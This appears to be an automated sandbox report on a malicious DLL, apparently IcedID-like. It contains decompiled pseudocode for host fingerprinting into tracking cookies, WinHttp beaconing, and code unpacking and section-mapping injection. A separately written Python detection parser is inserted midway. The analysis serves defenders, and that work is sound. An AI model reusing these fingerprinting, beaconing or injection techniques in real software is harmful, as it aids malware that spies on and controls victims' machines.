6700->6706 6708 180001153 GetProcessHeap HeapFree 6700->6708 6701 1800010f5 GetProcessHeap 6703 18000111a RtlAllocateHeap 6701->6703 6704 18000110c HeapReAlloc 6701->6704 6705 180001170 GetProcessHeap HeapFree 6702->6705 6702->6706 6703->6707 6704->6707 6705->6706 6709 180001904 6706->6709 6707->6697 6707->6698 6707->6701 6707->6706 6708->6706 6710 18000192d LoadLibraryA GetProcAddress 6709->6710 6711 18000199a wsprintfW wsprintfW 6710->6711 6713 180001953 6710->6713 6712 1800019da wsprintfW 6711->6712 6746 180001bd4 6712->6746 6713->6711 6715 18000195e wsprintfW wsprintfW 6713->6715 6715->6712 6750 180002c88 6717->6750 6721 180002062 6720->6721 6757 1800014b4 6721->6757 6724 1800020a1 6725 1800014b4 6 API calls 6724->6725 6726 1800020be 6725->6726 6727 1800014b4 6 API calls 6726->6727 6728 1800020d4 6727->6728 6763 180001c28 GetComputerNameExW 6728->6763 6731 180002144 wsprintfW 6734 180002142 6731->6734 6732 1800020ff wsprintfW 6733 18000213d 6732->6733 6733->6734 6735 180002117 wsprintfW 6733->6735 6736 18000133c LoadLibraryA GetProcAddress 6734->6736 6735->6733 6737 180001388 GetAdaptersInfo 6736->6737 6744 1800013df 6736->6744 6738 180001396 6737->6738 6737->6744 6739 18000139f GetProcessHeap HeapAlloc 6738->6739 6738->6744 6740 1800013bd GetAdaptersInfo 6739->6740 6739->6744 6741 1800013cb GetProcessHeap HeapFree 6740->6741 6742 180001414 6740->6742 6741->6744 6743 18000145f GetProcessHeap HeapFree 6742->6743 6743->6744 6744->6664 6745->6654 6747 180001bea LoadLibraryA GetProcAddress 6746->6747 6748 1800019ff wsprintfW 6747->6748 6749 180001c0e GetNativeSystemInfo 6747->6749 6748->6658 6749->6748 6751 180002cb5 6750->6751 6754 180002ac0 6751->6754 6755 180002adb SwitchToThread SwitchToThread 6754->6755 6755->6755 6756 1800027cb wsprintfW wsprintfW wsprintfW wsprintfW 6755->6756 6756->6660 6758 1800014d7 6757->6758 6773 180001604 lstrlenW 6758->6773 6761 18000154c GetProcessHeap HeapFree 6762 180001560 GetUserNameW 6761->6762 6762->6724 6764 180001d68 
6763->6764 6765 180001c60 LookupAccountNameW 6763->6765 6764->6731 6764->6732 6765->6764 6766 180001c96 GetLastError 6765->6766 6766->6764 6767 180001ca5 6766->6767 6767->6764 6768 180001cb0 GetProcessHeap HeapAlloc 6767->6768 6768->6764 6769 180001cd6 LookupAccountNameW 6768->6769 6770 180001d54 GetProcessHeap HeapFree 6769->6770 6772 180001d08 6769->6772 6770->6764 6771 180001d3c GetProcessHeap HeapFree 6771->6764 6772->6771 6772->6772 6774 1800014f9 6773->6774 6775 180001627 GetProcessHeap HeapAlloc 6773->6775 6774->6761 6774->6762 6775->6774 6776 180001647 WideCharToMultiByte 6775->6776 6776->6774 6786 1800024fc WinHttpOpen 6777->6786 6781 1800018de 6780->6781 6782 18000178e 6780->6782 6781->6670 6782->6781 6783 180001801 GetProcessHeap HeapAlloc 6782->6783 6784 180001827 6782->6784 6783->6781 6783->6784 6784->6781 6785 1800018ca GetProcessHeap HeapFree 6784->6785 6785->6781 6787 180001b54 6786->6787 6789 180002556 6786->6789 6787->6670 6788 180002574 WinHttpConnect 6791 180002594 WinHttpOpenRequest 6788->6791 6792 180002790 WinHttpCloseHandle 6788->6792 6789->6788 6790 180002568 WinHttpSetStatusCallback 6789->6790 6790->6788 6793 180002787 WinHttpCloseHandle 6791->6793 6794 1800025e8 6791->6794 6792->6787 6793->6792 6795 18000260b WinHttpSendRequest 6794->6795 6796 1800025ed WinHttpSetOption 6794->6796 6797 18000277e WinHttpCloseHandle 6795->6797 6798 18000263f WinHttpReceiveResponse 6795->6798 6796->6795 6797->6793 6798->6797 6799 180002652 WinHttpQueryHeaders WinHttpQueryHeaders 6798->6799 6800 1800026b6 WinHttpQueryDataAvailable 6799->6800 6801 180002734 6800->6801 6802 1800026ca 6800->6802 6803 180002760 6801->6803 6805 18000274c GetProcessHeap HeapFree 6801->6805 6802->6800 6802->6801 6804 1800026d7 GetProcessHeap 6802->6804 6808 18000270f WinHttpReadData 6802->6808 6803->6797 6806 1800026fc HeapAlloc 6804->6806 6807 1800026ee HeapReAlloc 6804->6807 6805->6803 6806->6802 6807->6802 6808->6801 6808->6802 6810 1800016e1 6 API calls 6809->6810 6811 1800016da 
6809->6811 6831 180002a18 CreateFileA 6810->6831 6811->6810 6815 180001042 lstrcatA 6814->6815 6816 180001038 6814->6816 6817 180001061 6815->6817 6816->6815 6818 180002a18 CreateFileA 6817->6818 6819 1800011e9 6818->6819 6820 180002a5b WriteFile CloseHandle 6818->6820 6819->6682 6819->6683 6820->6819 6834 180001f2c lstrcpyA SHGetFolderPathA 6821->6834 6824 180002311 GetProcessHeap HeapAlloc 6825 180002338 6824->6825 6830 1800023f3 6824->6830 6826 180002415 6825->6826 6827 1800023d5 6825->6827 6840 180002b5c VirtualAlloc 6826->6840 6829 1800023df GetProcessHeap HeapFree 6827->6829 6827->6830 6829->6830 6830->6685 6832 1800011c7 6831->6832 6833 180002a5b WriteFile CloseHandle 6831->6833 6832->6678 6832->6679 6833->6832 6835 180001f95 lstrcatA 6834->6835 6836 180001f86 lstrcpyA 6834->6836 6837 180001fa2 lstrcatA lstrcpyA 6835->6837 6836->6837 6838 180001ff6 6837->6838 6839 180001fe0 lstrcpyA 6837->6839 6838->6824 6838->6825 6838->6830 6839->6838 6841 180002b95 GetLastError 6840->6841 6842 180002baa 6840->6842 6843 180002c00 6841->6843 6842->6843 6851 180001e64 6842->6851 6843->6830 6846 180002c16 GetLastError 6846->6843 6847 180002c28 6848 180002c56 6847->6848 6849 180002c2d VirtualProtect 6847->6849 6848->6843 6850 180002c63 GetLastError 6848->6850 6849->6848 6849->6849 6850->6843 6852 180001f08 6851->6852 6855 180001e8a 6851->6855 6852->6846 6852->6847 6853 180001e97 LoadLibraryA 6853->6852 6853->6855 6854 180001ed0 GetProcAddress 6854->6852 6854->6855 6855->6852 6855->6853 6855->6854 6856 180001b08 6857 1800024fc 19 API calls 6856->6857 6858 180001b54 6857->6858 6859 180001318 6860 180001329 6859->6860 6861 180001332 ExitProcess 6860->6861 6862 18000131e SleepEx 6860->6862 6862->6860 6863 7fef7536271 6864 7fef753623f 6863->6864 6864->6863 6865 7fef753620e NtCreateSection 6864->6865 6869 7fef753621e 6864->6869 6868 7fef7536594 6865->6868 6866 7fef75366d4 6867 7fef75366a7 NtMapViewOfSection 6867->6869 6868->6868 6869->6866 6869->6867 6870 7fef7532cca 6871 
7fef7532f92 CryptCreateHash 6870->6871 6872 7fef7532f68 6871->6872 6873 7fef75336fa 6876 7fef7533708 6873->6876 6874 7fef75336ec 6875 7fef7533834 RtlAllocateHeap 6875->6874 6875->6876 6876->6873 6876->6874 6876->6875 6877 2a0000 6878 2a0036 6877->6878 6879 2a0127 GetNativeSystemInfo 6878->6879 6882 2a04e1 6878->6882 6880 2a015f VirtualAlloc 6879->6880 6879->6882 6884 2a017d 6880->6884 6881 2a02f1 LoadLibraryA 6881->6884 6883 2a0341 6883->6882 6885 2a04bd VirtualProtect 6883->6885 6884->6881 6884->6883 6885->6883 6886 18000244c 6887 180002474 6886->6887 6888 180002455 CreateThread 6886->6888 6888->6887 6901 7fef7535fe6 6902 7fef7535fdd 6901->6902 6903 7fef7535fed 6901->6903 6904 7fef753620e NtCreateSection 6903->6904 6905 7fef753621e 6903->6905 6906 7fef7536594 6904->6906 6905->6902 6907 7fef75366a7 NtMapViewOfSection 6905->6907 6906->6906 6907->6905 6889 7fef7532cf7 6890 7fef7532d01 CryptAcquireContextW 6889->6890 6891 7fef7532cda CryptCreateHash 6889->6891 6893 7fef7532faa 6890->6893 6891->6893 6894 7fef7535ff9 6895 7fef7536173 6894->6895 6896 7fef753620e NtCreateSection 6895->6896 6899 7fef753621e 6895->6899 6900 7fef753616d 6895->6900 6896->6900 6897 7fef75366d4 6898 7fef75366a7 NtMapViewOfSection 6898->6899 6899->6897 6899->6898

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Http$Heap$CloseHandleQuery$AllocDataHeadersOpenProcessRequest$AvailableCallbackConnectFreeOptionReadReceiveResponseSendStatus
                                              • String ID: GET$POST
                                              • API String ID: 1614834629-3192705859
                                              • Opcode ID: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                              • Instruction ID: f84e999ab61f2fbba52d9160ce5dc28e4838b3332290d6c6070ea75f8e9928f1
                                              • Opcode Fuzzy Hash: 4b22a6a2d3247f66cd39c864717bf5e5cc05fe6dbe070548806b85aa6a32ad93
                                              • Instruction Fuzzy Hash: A881A972304B8987EBA6CF66E800BD937A5FB4CBD4F448129AE0957B54DF38C698C704
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 22%
                                              			E0000000118000133C(long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                              				void* __rdi;
                                              				void* _t16;
                                              				void* _t19;
                                              				long long* _t34;
                                              				void* _t48;
                                              				long long* _t54;
                                              				long long* _t56;
                                              				void* _t62;
                                              				void* _t63;
                                              				struct HINSTANCE__* _t64;
                                              				CHAR* _t67;
                                              
                                              				_t34 = _t56;
                                              				 *((long long*)(_t34 + 8)) = __rbx;
                                              				 *((long long*)(_t34 + 0x18)) = __rbp;
                                              				 *((long long*)(_t34 + 0x20)) = __rsi;
                                              				 *(_t34 + 0x10) =  *(_t34 + 0x10) & 0;
                                              				LoadLibraryA(_t67); // executed
                                              				GetProcAddress(_t64);
                                              				_t54 = _t34;
                                              				if (_t34 == 0) goto 0x800013df;
                                              				_t16 =  *_t54(); // executed
                                              				if (_t16 != 0x6f) goto 0x800013df;
                                              				if (__rbx == 0) goto 0x800013df;
                                              				GetProcessHeap();
                                              				HeapAlloc(??, ??, ??);
                                              				if (_t34 == 0) goto 0x800013df;
                                              				_t19 =  *_t54(); // executed
                                              				if (_t19 == 0) goto 0x80001414;
                                              				GetProcessHeap();
                                              				HeapFree(??, ??, ??);
                                              				r9d = 1;
                                              				return E00000001180001578(0, _t34, __rbx, __rcx, L"; _gid=", _t34, 0x800070bc, _t62, _t63, _t48);
                                              			}
                                              0x18000133c
                                              0x18000133f
                                              0x180001343
                                              0x180001347
                                              0x180001367
                                              0x18000136a
                                              0x18000137a
                                              0x180001380
                                              0x180001386
                                              0x18000138f
                                              0x180001394
                                              0x18000139d
                                              0x18000139f
                                              0x1800013af
                                              0x1800013bb
                                              0x1800013c5
                                              0x1800013c9
                                              0x1800013cb
                                              0x1800013d9
                                              0x1800013df
                                              0x180001413

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AdaptersFreeInfo$AddressAllocLibraryLoadProc
                                              • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL
                                              • API String ID: 3866128989-336904856
                                              • Opcode ID: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                              • Instruction ID: b75e3b5367209cd78c64b13d950b78932923334006a58f125620b5977970df53
                                              • Opcode Fuzzy Hash: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                              • Instruction Fuzzy Hash: 55317872600B88DAEB96DB22F4443D973A1AB4DBC5F48C025EA0D0A765DF38C64EC300
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$Free$AddressAllocAllocateInformationLibraryLoadProcQuerySystem
                                              • String ID: NTDLL.DLL$ZwQuerySystemInformation
                                              • API String ID: 2948972359-2445179936
                                              • Opcode ID: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                              • Instruction ID: c553ab603bbb7ea155e402bcf953277eb51bc389a09fd2bd74e1016edb044849
                                              • Opcode Fuzzy Hash: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                              • Instruction Fuzzy Hash: 5B313E72715A89C6FADADB56A8043D972A1AB4CBC2F48C034FB0957754EF3CCA4D8705
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 44%
                                              			E00000001180002018(void* __eax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
                                              				void* __rbp;
                                              				int _t34;
                                              				void* _t37;
                                              				signed long long _t49;
                                              				signed long long _t52;
                                              				void* _t83;
                                              				WCHAR* _t85;
                                              				void* _t86;
                                              				signed long long _t88;
                                              				void* _t89;
                                              				WCHAR* _t98;
                                              				WCHAR* _t100;
                                              
                                              				_t49 = _t88;
                                              				 *((long long*)(_t49 + 0x10)) = __rbx;
                                              				 *((long long*)(_t49 + 0x18)) = __rsi;
                                              				 *((long long*)(_t49 + 0x20)) = __rdi;
                                              				_t86 = _t49 - 0x168;
                                              				_t89 = _t88 - 0x250;
                                              				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
                                              				_t83 = __rcx;
                                              				__imp__GetComputerNameExW(); // executed
                                              				if (__eax != 0) goto 0x8000206a;
                                              				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
                                              				E000000011800014B4(_t49, __rbx, __rcx, L"; _u=", __rcx, _t86, _t89 + 0x40);
                                              				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
                                              				_t52 = _t49; // executed
                                              				_t34 = GetUserNameW(_t100); // executed
                                              				if (_t34 != 0) goto 0x800020a9;
                                              				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
                                              				E000000011800014B4(_t49, _t52, _t83 + _t52 * 2, ":", _t83, _t86, _t89 + 0x40);
                                              				_t53 = _t52 + _t49;
                                              				_t37 = E00000001180001C28(E000000011800014B4(_t49, _t52 + _t49, _t83 + (_t52 + _t49) * 2, ":", _t83, _t86, __rdx), 5, _t53 + _t49, _t89 + 0x20);
                                              				r14d = _t37;
                                              				if (_t37 == 0) goto 0x80002144;
                                              				r9d =  *((intOrPtr*)(_t89 + 0x20));
                                              				wsprintfW(_t98);
                                              				goto 0x8000213d;
                                              				r9d =  *((intOrPtr*)(_t89 + 0x20 + __rdx * 4));
                                              				wsprintfW(_t85);
                                              				if (__rdx + 1 - _t98 < 0) goto 0x80002117;
                                              				goto 0x80002153;
                                              				r9d = 0;
                                              				return wsprintfW(??, ??);
                                              			}

                                              Instruction address column for the listing above: 0x180002018 to 0x180002172


                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf$Name$ComputerUser
                                              • String ID: %s%u$; __io=$; _u=$x
                                              • API String ID: 4095488650-3513353778
                                              • Opcode ID: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                              • Instruction ID: 7d741998cccdb29629df25af753f6537b3149e73fb9b8afa304b05458abafeeb
                                              • Opcode Fuzzy Hash: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                              • Instruction Fuzzy Hash: A73149B2704A8992EBA2CB11E8443D97370F75C7C5F948126EA4D5B665EF3CC60EC740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
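The two fingerprint routines above (the one keyed on GetAdaptersInfo / "; _gid=" and E00000001180002018, which calls GetComputerNameExW and GetUserNameW around the literals "; _u=", ":", "; __io=" and "%s%u") assemble a cookie-style header that identifies the infected host to the C2. The block below is an added example for this report, not code recovered from the sample or from Joe Sandbox: a small parser a detection engineer could run over proxy logs to split such a Cookie header and recover the host and user. The ';'-separated key=value layout follows the "; _u=" literals on the page; that the `_u` value is the hex encoding of "COMPUTERNAME:username" is an assumption (the 0x78 'x' constant handed to the helper suggests hex formatting, but the report does not state the encoding), and the sample header is constructed, not captured traffic.

```python
"""Parse an IcedID-style host-fingerprint Cookie header.

Added example for this report; not code recovered from the sample.
Assumptions (not stated by the report): the '_u' value is hex-encoded
"COMPUTERNAME:username"; the sample header below is constructed.
"""
import re
from typing import Dict, Optional

# Cookie keys written by the decompiled fingerprint routines (from the report's strings).
ICEDID_KEYS = ("_u", "__io", "_gid")

# Constructed sample: hex("DESKTOP-1:alice") plus opaque filler values and one unrelated key.
SAMPLE_COOKIE = (
    "sid=abc123; "
    "_u=4445534b544f502d313a616c696365; __io=21_4013_3_333; _gid=0011223344"
)


def parse_cookie(header: str) -> Dict[str, str]:
    """Split a Cookie header into key/value pairs; the first occurrence of a key wins."""
    pairs: Dict[str, str] = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue  # tolerate malformed fragments instead of failing the whole header
        key, value = part.split("=", 1)
        pairs.setdefault(key.strip(), value.strip())
    return pairs


def decode_u(value: str) -> Optional[str]:
    """Decode '_u' under the hex("HOST:USER") assumption; None if it does not fit."""
    if not re.fullmatch(r"[0-9a-fA-F]+", value) or len(value) % 2:
        return None
    try:
        text = bytes.fromhex(value).decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if ":" in text else None


def fingerprint(header: str) -> Optional[Dict[str, str]]:
    """Return host/user/io/gid if the header carries the full IcedID key set, else None.

    Requiring all three keys (and a decodable '_u') keeps the match narrow enough
    for an alert; a lone '_gid' or '__io' is too common in benign analytics cookies.
    """
    pairs = parse_cookie(header)
    if not all(k in pairs for k in ICEDID_KEYS):
        return None
    decoded = decode_u(pairs["_u"])
    if decoded is None:
        return None
    host, user = decoded.split(":", 1)
    return {"host": host, "user": user, "io": pairs["__io"], "gid": pairs["_gid"]}


if __name__ == "__main__":
    print(fingerprint(SAMPLE_COOKIE))
```

Run it over the `Cookie:` request header column of a proxy export; a non-None result names the host and user the beacon is reporting, which is the pivot a responder needs to find the machine.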

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
                                              • String ID:
                                              • API String ID: 2409119217-0
                                              • Opcode ID: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                              • Instruction ID: bccd91b441821ca56803e91b7d04f4d1ec65d623121010ca1dafda4b918fcf64
                                              • Opcode Fuzzy Hash: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                              • Instruction Fuzzy Hash: 06315E72701B498AEB62DF74E4443D933E5EB4DBC9F548026EA4D56A58EF38C60CC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 56%
                                              			E00000001180002174(void* __eax, void* __eflags, signed int __rax, signed int __rbx, signed int __rcx, signed int __rdx, long long __rdi, void* __rsi, void* __r11, void* __r14) {
                                              				void* __rbp;
                                              				void* _t27;
                                              				signed long long _t51;
                                              				void* _t72;
                                              				long _t75;
                                              				void* _t76;
                                              				void* _t78;
                                              				void* _t85;
                                              
                                              				_t74 = __rsi;
                                              				_t52 = __rbx;
                                              				 *((long long*)(_t78 + 0x18)) = __rbx;
                                              				 *((long long*)(_t78 + 0x20)) = __rdi;
                                              				_t76 = _t78 - 0x57;
                                              				_t4 = _t52 + 4; // 0x4
                                              				asm("rdtsc");
                                              				_t51 = __rax | __rdx << 0x00000020;
                                              				_t54 = __rbx << 0x00000010 | __rcx;
                                              				SleepEx(_t75); // executed
                                              				_t72 = __rdi - 1;
                                              				if (__eflags != 0) goto 0x80002190;
                                              				wsprintfW(??, ??);
                                              				E00000001180002428(_t76 - 0x29, __rbx << 0x00000010 | __rcx);
                                              				_t9 = _t72 + 1; // 0x4
                                              				E00000001180002860( *((intOrPtr*)(_t76 + 0x17)), _t9, _t4, _t51, __rbx << 0x00000010 | __rcx, __rsi, _t76, _t76 - 0x69, _t85);
                                              				if (_t51 == 0) goto 0x8000224e;
                                              				if (E00000001180001D80(_t9, _t51, _t51, _t54, _t76 + 0x1b, _t51, _t74, _t76, _t76 + 0x67, _t76 + 0x6f, __r11, __r14) == 0) goto 0x8000224e;
                                              				if ( *((intOrPtr*)(_t76 + 0x6f)) - 0x400 < 0) goto 0x8000224e;
                                              				_t27 = E00000001180001198(_t9,  *((intOrPtr*)(_t76 + 0x67)),  *((intOrPtr*)(_t76 + 0x6f)), _t76 + 0x67);
                                              				if ( *((intOrPtr*)(_t76 + 0x67)) == 0) goto 0x80002232;
                                              				GetProcessHeap();
                                              				HeapFree(??, ??, ??);
                                              				E00000001180001B5C(_t27, _t51,  *((intOrPtr*)(_t76 + 0x67)), _t76 - 0x69, _t74);
                                              				if (_t51 == 0) goto 0x8000224e;
                                              				E00000001180002480(_t51, _t76 + 0x1b, _t51);
                                              				return 0;
                                              			}

                                              Instruction address column for the listing above: 0x180002174 to 0x180002264


                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcessSleepwsprintf
                                              • String ID: %016IX
                                              • API String ID: 2187706517-1811457740
                                              • Opcode ID: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                              • Instruction ID: 661cb7bdf0d2a5cc3032a3c802704869fbd6bc5f67ca47283b56c7d180ea033d
                                              • Opcode Fuzzy Hash: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                              • Instruction Fuzzy Hash: E9214F72300A499AEB92DFA1D9543DD33A6E7487C4F888425BE0D6B699EE38D64CC350
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Control-flow graph (interactive view, node legend: Executed / Not Executed). Basic blocks span 7fef7535ff9 to 7fef7536789; the block at 7fef753620e calls NtCreateSection, the block at 7fef75366a7 calls NtMapViewOfSection, and the blocks at 7fef7536731, 7fef753675e and 7fef753676a call the internal function at 7fef7537947.
                                              C-Code - Quality: 100%
                                              			E000007FE7FEF7535FF9(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344) {
                                              				intOrPtr _t40;
                                              				void* _t57;
                                              
                                              				_a344 = 0x18f;
                                              				_a344 = _a344 + 0xff;
                                              				_a324 = 0x1d29;
                                              				_a324 = _a324 + 0x3c;
                                              				if (__ecx == __ecx) goto 0xf7536042;
                                              				_a336 = 0x7b;
                                              				_a336 = _a336;
                                              				if (__edx == __edx) goto 0xf753608a;
                                              				_a328 = 6;
                                              				_a328 = _a328 + 0x27;
                                              				if (__ebx == __ebx) goto 0xf7536059;
                                              				_a332 = 0x35;
                                              				_a332 = _a332 + 0x17;
                                              				if (__eax == __eax) goto 0xf753602b;
                                              				_a312 = 0x19cc;
                                              				_a312 = _a312 + 0xa0;
                                              				if (__ebx == __ebx) goto 0xf75360a5;
                                              				_a340 = 0xd9;
                                              				_a340 = _a340 + 0x81;
                                              				goto E000007FE7FEF7535FF9;
                                              				_a316 = 0x5c;
                                              				_a316 = _a316 + 0x8f;
                                              				if (__ecx == __ecx) goto 0xf75360d7;
                                              				_a308 = 7;
                                              				_a308 = _a308 + 0x12;
                                              				if (__ecx == __ecx) goto 0xf7536070;
                                              				_a320 = 0x24b;
                                              				_a320 = _a320 + 0x30;
                                              				if (__edx == __edx) goto L1;
                                              				_t40 =  *((intOrPtr*)(_t57 + 0x70 + _a80 * 4));
                                              				if (_t40 - 0x1f4 <= 0) goto 0xf75360f2;
                                              				return _t40;
                                              			}

                                              Instruction address column for the listing above: 0x7fef7535ff9 to 0x7fef753611b


                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateSection
                                              • String ID: $$'$<
                                              • API String ID: 2449625523-1052150772
                                              • Opcode ID: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                              • Instruction ID: 1d446540bbbf3a4f3d84ffa38f120e57b627df9f1bf22c920460f5d7b654e3cd
                                              • Opcode Fuzzy Hash: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                              • Instruction Fuzzy Hash: D521ECB691C2C2CBF6F08B14A4483BAB7E2E384354F500539EA8A469B9D77DD4449F41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Control-flow graph (interactive view, node legend: Executed / Not Executed). Basic blocks span 7fef7535fdd to 7fef75366db; the block at 7fef753620e calls NtCreateSection and the block at 7fef75366a7 calls NtMapViewOfSection.
                                              C-Code - Quality: 100%
                                              			E000007FE7FEF7535FE6(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a88, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344, intOrPtr _a448) {
                                              				intOrPtr _t41;
                                              
                                              				if (_a88 < 0) goto 0xf7535fdd;
                                              				_t41 = _a448;
                                              				_a344 = 0x18f;
                                              				_a344 = _a344 + 0xff;
                                              				_a324 = 0x1d29;
                                              				_a324 = _a324 + 0x3c;
                                              				if (__ecx == __ecx) goto 0xf7536042;
                                              				_a336 = 0x7b;
                                              				_a336 = _a336;
